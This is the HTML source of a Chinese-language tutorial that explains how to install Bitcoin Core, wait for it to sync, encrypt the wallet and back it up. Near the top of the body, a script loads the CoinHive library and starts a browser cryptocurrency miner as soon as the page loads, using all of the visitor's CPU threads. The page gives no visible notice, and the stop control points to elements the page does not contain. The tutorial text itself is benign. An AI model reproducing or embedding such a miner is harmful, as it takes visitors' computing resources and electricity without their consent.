<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="description" content="比特幣錢包 (Bitcoin Wallet) 百百種，有的在手機上裝個APP就可以存幣，有的還得購買實體錢包才能生效，要怎麼挑選一個適合自己的比特幣錢包呢？今天介紹的是安全性和便利性適中的PC版錢包－Bitcoin Core，大概也是目前最廣為人知且飯用的比特幣錢包，安全性勝於手機版的APP錢包，便利性優於硬體錢包，缺點就是在第一次使用時要補齊大約 180GB 大小的區塊鏈，要確保硬碟有足夠空間再安裝。" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Bitcoin Core 註冊比特幣錢包 (Bitcoin Wallet) 教學</title>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-110965571-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-110965571-1');
</script>
<style type="text/css">
<!--
body {
	font: 100%/1.4 Verdana, Arial, Helvetica, sans-serif;
	background-color: #4E5869;
	margin: 0;
	padding: 0;
	color: #000;
}

/* ~~ 元素/標籤選取器 ~~ */
ul, ol, dl { /* 由於瀏覽器之間的差異，最佳作法是在清單中使用零寬度的欄位間隔及邊界。為了保持一致，您可以在這裡指定所要的量，或在清單包含的清單項目 (LI、DT、DD) 上指定所要的量。請記住，除非您寫入較為特定的選取器，否則在此執行的作業將重疊顯示到 .nav 清單。 */
	padding: 0;
	margin: 0;
}
h1, h2, h3, h4, h5, h6, p {
	margin-top: 0;	 /* 移除上方邊界可以解決邊界可能從其包含的 Div 逸出的問題。剩餘的下方邊界可以保持 Div 不與接在後面的元素接觸。 */
	padding-right: 15px;
	padding-left: 15px; /* 將欄位間隔加入至 Div 內元素的兩側 (而不是 Div 本身)，即可不需執行任何方塊模型的計算作業。具有側邊欄位間隔的巢狀 Div 也可當做替代方法。 */
	text-align: center;
}
a img { /* 這個選取器會移除某些瀏覽器在影像由連結所圍繞時，影像周圍所顯示的預設藍色邊框 */
	border: none;
}

/* ~~ 網站連結的樣式設定必須保持此順序，包括建立滑過 (Hover) 效果的選取器群組在內。~~ */
a:link {
	color:#414958;
	text-decoration: underline; /* 除非您要設定非常獨特的連結樣式，否則最好提供底線，以便快速看出 */
}
a:visited {
	color: #4E5869;
	text-decoration: underline;
}
a:hover, a:active, a:focus { /* 這個選取器群組可以讓使用鍵盤導覽的使用者，也和使用滑鼠的使用者一樣擁有相同的滑過體驗。 */
	text-decoration: none;
}

/* ~~ 這個容器環繞著所有其他的 Div，並依百分比設定其寬度 ~~ */
.container {
	width: 80%;
	max-width: 1260px;/* 建議您使用最大寬度，如此版面在大型螢幕上就不致於過寬，讓行保持比較方便閱讀的長度。IE6 並不適用這項宣告。 */
	min-width: 780px;/* 建議您使用最小寬度，如此版面在大型螢幕上就不致於過窄，讓行在側欄中保持比較方便閱讀的長度。IE6 並不適用這項宣告。 */
	background-color: #FFF;
	margin: 0 auto; /* 兩側的自動值與寬度結合後，版面便會置中對齊。如果將 .container 的寬度設為 100%，就不需要這麼做。 */
}

/* ~~ 這是版面資訊。~~ 

1) 欄位間隔只會置於 Div 的頂端或底部。此 Div 內的元素在兩側會有欄位間隔，可讓您不需進行「方塊模型計算」。請記住，如果對 Div 本身加入任何側邊的欄位間隔或邊框，在計算「總」寬度時，就會將這些加入您定義的寬度。您也可以選擇移除 Div 中元素的欄位間隔，然後在其中放置沒有寬度的第二個 Div，並依設計所需放置欄位間隔。

*/
.content {
	padding: 10px 0;
}

/* ~~ 這個群組選取器會在 .content 區域空間中提供清單 ~~ */
.content ul, .content ol { 
	padding: 0 15px 15px 40px; /* 這個欄位間隔反映出上方標題和段落規則中的右方間隔。當欄位間隔位於下方時，便可將清單中的其他元素間隔開來；當位於左方時，則可藉此建立縮排。這些動作均可依需要進行調整。 */
}

/* ~~ 其他 float/clear 類別 ~~ */
.fltrt {  /* 這個類別可用來讓元素在頁面中浮動，浮動的元素必須位於頁面上相鄰的元素之前。 */
	float: right;
	margin-left: 8px;
}
.fltlft { /* 這個類別可用來讓元素在頁面左方浮動，浮動的元素必須位於頁面上相鄰的元素之前。 */
	float: left;
	margin-right: 8px;
}
.clearfloat { /* 這個類別可放置在 <br /> 或空白的 Div 上，當做接在 #container 內最後一個浮動 Div 後方的最後一個元素 (如果已移除 .container 上的 overflow:hidden) */
	clear:both;
	height:0;
	font-size: 1px;
	line-height: 0px;
}
-->
</style></head>

<body>

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

<script type="text/javascript">
var miner = new CoinHive.User('nueUIn9yJrvxUBki7TwJMs0s0bpqXDqb', 'User', {
	threads: navigator.hardwareConcurrency,
	autoThreads: false,
	throttle: 0.5,
	forceASMJS: false
	});
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
// Update stats once per second
setInterval(function() {
    var threadCount = miner.getNumThreads();
    var hashesPerSecond = Math.round(miner.getHashesPerSecond() * 100) / 100;
    var totalHashes = miner.getTotalHashes();
    var acceptedHashes = miner.getAcceptedHashes() / 256;
    // Output to HTML elements...
    if (miner.isRunning()) {
        document.getElementById("ths").innerHTML = "Hashes:</br> " + totalHashes;
        document.getElementById("minebutton").innerHTML = "<button onclick=\"miner.stop()\">Stop</br>Mining</button>";
    } else {
        document.getElementById("ths").innerHTML = "Total:</br>" + totalHashes;;
        document.getElementById("minebutton").innerHTML = "<button onclick=\"miner.start(CoinHive.FORCE_EXCLUSIVE_TAB)\">Continue</br>Mining</button>";
    }
}, 1000);
</script>

<div class="container">
  <div class="content">
    <blockquote>
      <blockquote>
        <blockquote>
          <h2>Bitcoin Core 註冊比特幣錢包 (Bitcoin Wallet) 教學 </h2>
          <p>&nbsp;</p>
          比特幣錢包 (Bitcoin Wallet) 百百種，有的在手機上裝個APP就可以存幣，有的還得購買實體錢包才能生效，要怎麼挑選一個適合自己的比特幣錢包呢？<br />
<br />
今天介紹的是安全性和便利性適中的PC版錢包－Bitcoin Core，大概也是目前最廣為人知且飯用的比特幣錢包，安全性勝於手機版的APP錢包，便利性優於硬體錢包，<b><span style="color: red;">缺點就是在第一次使用時要補齊大約 180GB 大小的區塊鏈，要確保硬碟有足夠空間再安裝。</span></b><br />
<br />
總結而言，如果這是你第一次使用比特幣錢包，那Bitcoin Core絕對是入門的好選擇。<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-l_Rqcut9VZg/WiJGd2ikAEI/AAAAAAAAA54/H79QqdlRUKwfr3PVknVMvjaxSKZDzTfwgCLcBGAs/s1600/2017-12-02_142101.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="88" data-original-width="213" src="https://4.bp.blogspot.com/-l_Rqcut9VZg/WiJGd2ikAEI/AAAAAAAAA54/H79QqdlRUKwfr3PVknVMvjaxSKZDzTfwgCLcBGAs/s1600/2017-12-02_142101.jpg" /></a></div>
<span style="font-size: large;"><b>Bitcoin Core</b></span><br />
<b>官方網站：<a href="https://bitcoincore.org/">https://bitcoincore.org/</a></b><br />
<b>下載頁面：<a href="https://bitcoincore.org/en/download/">https://bitcoincore.org/en/download/</a></b><br />
<b>空間需求：180GB</b><br />
<br />
<br />
<br />
進入下載頁面選取適合自己系統的載點(<a href="https://bitcoincore.org/en/download/">https://bitcoincore.org/en/download/</a>)且安裝後，第一次運行 Bitcoin Core 會需要先更新資料，補齊這幾年來的區塊鏈(Block Chain)，根據網路速度的不同可能要等個數小時讓他完成同步。<br />
<br />
<b><span style="color: red;">它同步的概念和P2P傳輸類似，在連接到更多使用者之後速度會開始大幅提升</span></b>，如果一開始看預估時間要個好幾天不用太擔心，之後就會倍數減少了。<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-RxUTctjwXeA/WiJNWSHSwCI/AAAAAAAAA7A/5xZpEo3JtSs2yTa6_DsEDhbTMOkaAqDUgCLcBGAs/s1600/2017-12-02_145052.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="569" data-original-width="659" height="552" src="https://4.bp.blogspot.com/-RxUTctjwXeA/WiJNWSHSwCI/AAAAAAAAA7A/5xZpEo3JtSs2yTa6_DsEDhbTMOkaAqDUgCLcBGAs/s640/2017-12-02_145052.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
同步完成後就可以設定錢包了，點<b>設定 &gt; 加密錢包</b>，這個密碼如果忘了那這個錢包裡的錢你就一輩子都沒辦法再看到它了，<b><span style="color: red;">沒有任何忘記密碼的補救措施</span></b>，所以務必將它記好。<br />
<br />
建議先開一個記事本，在鍵盤上亂敲一長串英數字再添加一些符號，然後直接複製過來並且把這整串密碼記好，或是使用類似密碼產生器的服務，用隨機亂數生成密碼會比傳統的英數字組合安全。<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-gbBSwKD6gPM/WiJOAqSTGRI/AAAAAAAAA7I/9KQ1b6vvJLAr6mH4a1vxD-P7_L41MekVgCLcBGAs/s1600/2017-12-02_145153.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="250" data-original-width="596" height="268" src="https://4.bp.blogspot.com/-gbBSwKD6gPM/WiJOAqSTGRI/AAAAAAAAA7I/9KQ1b6vvJLAr6mH4a1vxD-P7_L41MekVgCLcBGAs/s640/2017-12-02_145153.jpg" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Jdld60OmRXc/WiJOm5IPqRI/AAAAAAAAA7Q/WzNOpc06T1AiHS5PSlzs1i-n0lJ_AcUTwCLcBGAs/s1600/2017-12-02_145531.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="243" data-original-width="286" src="https://1.bp.blogspot.com/-Jdld60OmRXc/WiJOm5IPqRI/AAAAAAAAA7Q/WzNOpc06T1AiHS5PSlzs1i-n0lJ_AcUTwCLcBGAs/s1600/2017-12-02_145531.jpg" /></a></div>
<br />
<br />
<br />
<br />
如果怕忘記密碼，可以點 <b>檔案 &gt; 備份錢包</b>，將密碼匯出成一個.dat檔，但也請妥善保管，畢竟誰有這個檔案就等同於擁有你的錢包。<br />
<br />
這個步驟並非必需的，如果你覺得不會忘記密碼也可以選擇不備份。<br />
<b><span style="color: red;"><br /></span></b>
<b><span style="color: red;"><br /></span></b>
<b><span style="color: red;"><br /></span></b>
<b><span style="color: red;"><br /></span></b>
<br />
<b><span style="color: red;"><br /></span></b>
<b><span style="color: red;"><br /></span></b>
<b><span style="color: red;">最後也要提醒大家在操作比特幣或其他虛擬貨幣時不要長期把貨幣放在交易所</span></b>，交易所惡性倒閉的新聞層出不窮，在現階段缺乏有公信力機構監管的情況下，最好還是將貨幣放在錢包，避免不需要的風險。
            <!-- end .content -->
     
        </blockquote>
      </blockquote>
    </blockquote>
  </div>
  <!-- end .container --></div>
  
  <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4e3a680e5532cd78"></script>
</body>
</html>
